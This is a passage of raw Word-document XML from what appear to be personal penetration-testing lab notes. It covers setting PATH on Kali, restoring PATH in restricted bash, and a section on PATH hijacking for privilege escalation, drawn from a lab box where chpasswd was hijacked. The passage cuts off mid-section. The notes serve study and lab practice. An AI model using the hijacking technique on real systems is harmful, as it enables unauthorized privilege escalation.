          <w:t xml:space="preserve">Funbox</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002612">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1180"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This script creates a backup archive of the /var/www/html directory and stores it as html.tar in the /home/funny directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002613">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002614">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026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16">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9x92539ms9bg" w:id="332"/>
      <w:bookmarkEnd w:id="332"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add directory to my path on Kali</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002617">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rnemcjhizuow" w:id="333"/>
      <w:bookmarkEnd w:id="333"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Permanently:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002618">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002619">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's say I want to move</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to my PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000261A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000261B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1481"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subl ~/.zshrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000261C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1481"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add this line to the end:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000261D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1481"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"$HOME/bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:$PATH"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000261E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1481"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$HOME </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">just means </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, do this is equivalent to ~/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000261F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1481"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Avoid using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> when specifying path in PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002620">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1481"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">source ~/.zshrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002621">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002622">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002623">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1taagdzcks2i" w:id="334"/>
      <w:bookmarkEnd w:id="334"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Temporarily:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002624">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002625">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you run the command directly:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH="</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$HOME/bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:$PATH"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002626">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="523"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It takes effect immediately, but only in your current shell session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002627">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="523"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you close that terminal, the change is gone.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002628">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002629">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000262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2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000262C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8ygci8556ved" w:id="335"/>
      <w:bookmarkEnd w:id="335"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000262D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000262E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000262F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes (often in restricted bash), /bin and /sbin and other stuff is not added to the PATH, so we can't use commands. To fix this, use this command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002630">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="636"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002631">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="636"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This adds common system binary directories (like sbin, bin) to your current shell's PATH variable. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002632">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="636"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002633">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002634">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And look into the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rbash (restricted bash)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section for more information about restricted bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002635">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000263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37">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002638">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_meu1yx552cek" w:id="336"/>
      <w:bookmarkEnd w:id="336"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH environment variable hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002639">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000263A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another example of this is seen in the XXXXXXXXX B .149</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000263B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is how to add your own path to the start of the PATH variable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000263C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH=/home/john:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000263D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000263E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000263F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vmofjim6j3gq" w:id="337"/>
      <w:bookmarkEnd w:id="337"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to tell if a binary/command is hijackable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002640">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-B .149 for priv esc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we hijacked the command chpasswd because it didn't have a full path. But, then I tried hijacking echo, and it didn't work. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002641">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002642">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is because echo and chpasswd are not the same type of command! </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002643">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002644">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
